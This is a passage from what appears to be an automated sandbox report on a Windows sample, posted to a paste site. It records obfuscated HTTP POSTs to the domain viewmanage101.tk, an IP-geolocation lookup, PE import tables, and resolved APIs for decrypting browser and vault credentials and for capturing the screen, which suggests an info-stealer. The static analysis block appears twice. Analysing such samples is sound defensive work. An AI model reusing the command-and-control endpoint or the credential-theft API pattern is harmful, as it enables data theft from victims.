- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "viewmanage101.tk",
- "version": "1.1",
- "path": "/webaz.php",
- "data": "POST /webaz.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: viewmanage101.tk\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ip-api.com/json",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "GET",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/json",
- "data": "GET /json HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ip-api.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://viewmanage101.tk/webaz.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "viewmanage101.tk",
- "version": "1.1",
- "path": "/webaz.php",
- "data": "POST /webaz.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: viewmanage101.tk\r\nContent-Length: 64515\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DeleteCriticalSection",
- "address": "0x41d0dc"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x41d0e0"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x41d0e4"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x41d0e8"
- },
- {
- "name": "VirtualFree",
- "address": "0x41d0ec"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x41d0f0"
- },
- {
- "name": "LocalFree",
- "address": "0x41d0f4"
- },
- {
- "name": "LocalAlloc",
- "address": "0x41d0f8"
- },
- {
- "name": "GetTickCount",
- "address": "0x41d0fc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x41d100"
- },
- {
- "name": "GetVersion",
- "address": "0x41d104"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x41d108"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x41d10c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x41d110"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x41d114"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x41d118"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x41d11c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x41d120"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x41d124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x41d128"
- },
- {
- "name": "ExitProcess",
- "address": "0x41d12c"
- },
- {
- "name": "WriteFile",
- "address": "0x41d130"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x41d134"
- },
- {
- "name": "RtlUnwind",
- "address": "0x41d138"
- },
- {
- "name": "RaiseException",
- "address": "0x41d13c"
- },
- {
- "name": "GetStdHandle",
- "address": "0x41d140"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "GetKeyboardType",
- "address": "0x41d148"
- },
- {
- "name": "MessageBoxA",
- "address": "0x41d14c"
- },
- {
- "name": "CharNextA",
- "address": "0x41d150"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x41d158"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x41d15c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x41d160"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "SysFreeString",
- "address": "0x41d168"
- },
- {
- "name": "SysReAllocStringLen",
- "address": "0x41d16c"
- },
- {
- "name": "SysAllocStringLen",
- "address": "0x41d170"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "GetModuleHandleA",
- "address": "0x41d178"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x41d180"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x41d184"
- },
- {
- "name": "FreeSid",
- "address": "0x41d188"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "WriteFile",
- "address": "0x41d190"
- },
- {
- "name": "Sleep",
- "address": "0x41d194"
- },
- {
- "name": "LocalFree",
- "address": "0x41d198"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x41d19c"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x41d1a0"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x41d1a4"
- },
- {
- "name": "GlobalLock",
- "address": "0x41d1a8"
- },
- {
- "name": "GetTickCount",
- "address": "0x41d1ac"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x41d1b0"
- },
- {
- "name": "GetProcAddress",
- "address": "0x41d1b4"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x41d1b8"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x41d1bc"
- },
- {
- "name": "GetFileAttributesW",
- "address": "0x41d1c0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x41d1c4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x41d1c8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x41d1cc"
- },
- {
- "name": "FindNextFileW",
- "address": "0x41d1d0"
- },
- {
- "name": "FindFirstFileW",
- "address": "0x41d1d4"
- },
- {
- "name": "FindClose",
- "address": "0x41d1d8"
- },
- {
- "name": "ExitProcess",
- "address": "0x41d1dc"
- },
- {
- "name": "DeleteFileW",
- "address": "0x41d1e0"
- },
- {
- "name": "CreateDirectoryW",
- "address": "0x41d1e4"
- },
- {
- "name": "CopyFileW",
- "address": "0x41d1e8"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x41d1f0"
- },
- {
- "name": "DeleteObject",
- "address": "0x41d1f4"
- },
- {
- "name": "DeleteDC",
- "address": "0x41d1f8"
- },
- {
- "name": "CreateCompatibleDC",
- "address": "0x41d1fc"
- },
- {
- "name": "CreateCompatibleBitmap",
- "address": "0x41d200"
- },
- {
- "name": "BitBlt",
- "address": "0x41d204"
- }
- ],
- "dll": "gdi32.dll"
- },
- {
- "imports": [
- {
- "name": "ReleaseDC",
- "address": "0x41d20c"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x41d210"
- },
- {
- "name": "GetDC",
- "address": "0x41d214"
- },
- {
- "name": "CharToOemBuffA",
- "address": "0x41d218"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "OleInitialize",
- "address": "0x41d220"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x41d224"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002b43c",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0041a684",
- "timestamp": "1992-06-19 22:22:17",
- "osversion": "4.0",
- "sections": [
- {
- "name": "CODE",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00019800",
- "entropy": "6.19",
- "raw_address": "0x00000400",
- "virtual_size": "0x000196b0",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": "DATA",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001b000",
- "size_of_data": "0x00000800",
- "entropy": "6.21",
- "raw_address": "0x00019c00",
- "virtual_size": "0x0000066c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": "BSS",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001c000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0001a400",
- "virtual_size": "0x000008c5",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".idata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001d000",
- "size_of_data": "0x00000800",
- "entropy": "4.58",
- "raw_address": "0x0001a400",
- "virtual_size": "0x0000079e",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0001e000",
- "size_of_data": "0x00001400",
- "entropy": "6.67",
- "raw_address": "0x0001ac00",
- "virtual_size": "0x0000135c",
- "characteristics_raw": "0x50000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0001d000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000079e"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0001e000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000135c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "6d1f2b41411eacafcf447fc002d8cb00",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 10,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "crypt32.dll.CryptUnprotectData",
- "crtdll.dll.wcscmp",
- "gdiplus.dll.GdiplusStartup",
- "gdiplus.dll.GdiplusShutdown",
- "gdiplus.dll.GdipCreateBitmapFromHBITMAP",
- "gdiplus.dll.GdipGetImageEncodersSize",
- "gdiplus.dll.GdipGetImageEncoders",
- "gdiplus.dll.GdipDisposeImage",
- "gdiplus.dll.GdipSaveImageToStream",
- "ole32.dll.CreateStreamOnHGlobal",
- "ole32.dll.GetHGlobalFromStream",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.GlobalMemoryStatus",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetEnvironmentVariableW",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.LocalFree",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.FindClose",
- "kernel32.dll.GlobalMemoryStatusEx",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.SetDllDirectoryW",
- "kernel32.dll.GetLocaleInfoA",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.GetLogicalDriveStringsA",
- "kernel32.dll.GetDriveTypeA",
- "kernel32.dll.CreateProcessW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.LookupAccountSidA",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.RegOpenKeyW",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptReleaseContext",
- "user32.dll.EnumDisplayDevicesW",
- "user32.dll.wvsprintfA",
- "user32.dll.GetKeyboardLayoutList",
- "shell32.dll.ShellExecuteExW",
- "ntdll.dll.RtlComputeCrc32",
- "sechost.dll.LookupAccountSidLocalA",
- "wininet.dll.InternetOpenA",
- "wininet.dll.InternetConnectA",
- "wininet.dll.HttpOpenRequestA",
- "wininet.dll.HttpAddRequestHeadersA",
- "wininet.dll.HttpSendRequestA",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetCrackUrlA",
- "wininet.dll.InternetSetOptionA",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "nss3.dll.sqlite3_open",
- "nss3.dll.sqlite3_close",
- "nss3.dll.sqlite3_prepare_v2",
- "nss3.dll.sqlite3_step",
- "nss3.dll.sqlite3_column_text",
- "nss3.dll.sqlite3_column_bytes",
- "nss3.dll.sqlite3_finalize",
- "nss3.dll.NSS_Init",
- "nss3.dll.PK11_GetInternalKeySlot",
- "nss3.dll.PK11_Authenticate",
- "nss3.dll.PK11SDR_Decrypt",
- "nss3.dll.NSS_Shutdown",
- "nss3.dll.PK11_FreeSlot",
- "kernel32.dll.InitializeCriticalSectionEx",
- "ole32.dll.CLSIDFromString",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultGetItem",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "mlang.dll.#112",
- "wininet.dll.FindFirstUrlCacheEntryA",
- "urlmon.dll.CreateUri",
- "wininet.dll.FindNextUrlCacheEntryA",
- "urlmon.dll.CreateIUriBuilder",
- "urlmon.dll.IntlPercentEncodeNormalize",
- "wininet.dll.FindCloseUrlCache",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.NdrClientCall2",
- "cryptbase.dll.SystemFunction041",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "kernel32.dll.IsProcessorFeaturePresent",
- "user32.dll.GetWindowInfo",
- "user32.dll.GetAncestor",
- "user32.dll.GetMonitorInfoA",
- "user32.dll.EnumDisplayMonitors",
- "user32.dll.EnumDisplayDevicesA",
- "gdi32.dll.ExtTextOutW",
- "gdi32.dll.GdiIsMetaPrintDC",
- "kernel32.dll.FlsGetValue",
- "windowscodecs.dll.DllGetClassObject",
- "kernel32.dll.WerRegisterMemoryBlock",
- "oleaut32.dll.#8",
- "oleaut32.dll.#9",
- "oleaut32.dll.#10",
- "kernel32.dll.IsWow64Process",
- "kernel32.dll.FlsFree"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DeleteCriticalSection",
- "address": "0x41d0dc"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x41d0e0"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x41d0e4"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x41d0e8"
- },
- {
- "name": "VirtualFree",
- "address": "0x41d0ec"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x41d0f0"
- },
- {
- "name": "LocalFree",
- "address": "0x41d0f4"
- },
- {
- "name": "LocalAlloc",
- "address": "0x41d0f8"
- },
- {
- "name": "GetTickCount",
- "address": "0x41d0fc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x41d100"
- },
- {
- "name": "GetVersion",
- "address": "0x41d104"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x41d108"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x41d10c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x41d110"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x41d114"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x41d118"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x41d11c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x41d120"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x41d124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x41d128"
- },
- {
- "name": "ExitProcess",
- "address": "0x41d12c"
- },
- {
- "name": "WriteFile",
- "address": "0x41d130"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x41d134"
- },
- {
- "name": "RtlUnwind",
- "address": "0x41d138"
- },
- {
- "name": "RaiseException",
- "address": "0x41d13c"
- },
- {
- "name": "GetStdHandle",
- "address": "0x41d140"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "GetKeyboardType",
- "address": "0x41d148"
- },
- {
- "name": "MessageBoxA",
- "address": "0x41d14c"
- },
- {
- "name": "CharNextA",
- "address": "0x41d150"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x41d158"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x41d15c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x41d160"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "SysFreeString",
- "address": "0x41d168"
- },
- {
- "name": "SysReAllocStringLen",
- "address": "0x41d16c"
- },
- {
- "name": "SysAllocStringLen",
- "address": "0x41d170"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "GetModuleHandleA",
- "address": "0x41d178"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x41d180"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x41d184"
- },
- {
- "name": "FreeSid",
- "address": "0x41d188"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "WriteFile",
- "address": "0x41d190"
- },
- {
- "name": "Sleep",
- "address": "0x41d194"
- },
- {
- "name": "LocalFree",
- "address": "0x41d198"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x41d19c"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x41d1a0"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x41d1a4"
- },
- {
- "name": "GlobalLock",
- "address": "0x41d1a8"
- },
- {
- "name": "GetTickCount",
- "address": "0x41d1ac"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x41d1b0"
- },
- {
- "name": "GetProcAddress",
- "address": "0x41d1b4"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x41d1b8"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x41d1bc"
- },
- {
- "name": "GetFileAttributesW",
- "address": "0x41d1c0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x41d1c4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x41d1c8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x41d1cc"
- },
- {
- "name": "FindNextFileW",
- "address": "0x41d1d0"
- },
- {
- "name": "FindFirstFileW",
- "address": "0x41d1d4"
- },
- {
- "name": "FindClose",
- "address": "0x41d1d8"
- },
- {
- "name": "ExitProcess",
- "address": "0x41d1dc"
- },
- {
- "name": "DeleteFileW",
- "address": "0x41d1e0"
- },
- {
- "name": "CreateDirectoryW",
- "address": "0x41d1e4"
- },
- {
- "name": "CopyFileW",
- "address": "0x41d1e8"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x41d1f0"
- },
- {
- "name": "DeleteObject",
- "address": "0x41d1f4"
- },
- {
- "name": "DeleteDC",
- "address": "0x41d1f8"
- },
- {
- "name": "CreateCompatibleDC",
- "address": "0x41d1fc"
- },
- {
- "name": "CreateCompatibleBitmap",
- "address": "0x41d200"
- },
- {
- "name": "BitBlt",
- "address": "0x41d204"
- }
- ],
- "dll": "gdi32.dll"
- },
- {
- "imports": [
- {
- "name": "ReleaseDC",
- "address": "0x41d20c"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x41d210"
- },
- {
- "name": "GetDC",
- "address": "0x41d214"
- },
- {
- "name": "CharToOemBuffA",
- "address": "0x41d218"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "OleInitialize",
- "address": "0x41d220"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x41d224"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002b43c",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0041a684",
- "timestamp": "1992-06-19 22:22:17",
- "osversion": "4.0",
- "sections": [
- {
- "name": "CODE",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00019800",
- "entropy": "6.19",
- "raw_address": "0x00000400",
- "virtual_size": "0x000196b0",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": "DATA",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001b000",
- "size_of_data": "0x00000800",
- "entropy": "6.21",
- "raw_address": "0x00019c00",
- "virtual_size": "0x0000066c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": "BSS",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001c000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0001a400",
- "virtual_size": "0x000008c5",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".idata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0001d000",
- "size_of_data": "0x00000800",
- "entropy": "4.58",
- "raw_address": "0x0001a400",
- "virtual_size": "0x0000079e",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0001e000",
- "size_of_data": "0x00001400",
- "entropy": "6.67",
- "raw_address": "0x0001ac00",
- "virtual_size": "0x0000135c",
- "characteristics_raw": "0x50000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0001d000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000079e"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0001e000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000135c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "6d1f2b41411eacafcf447fc002d8cb00",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 10,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment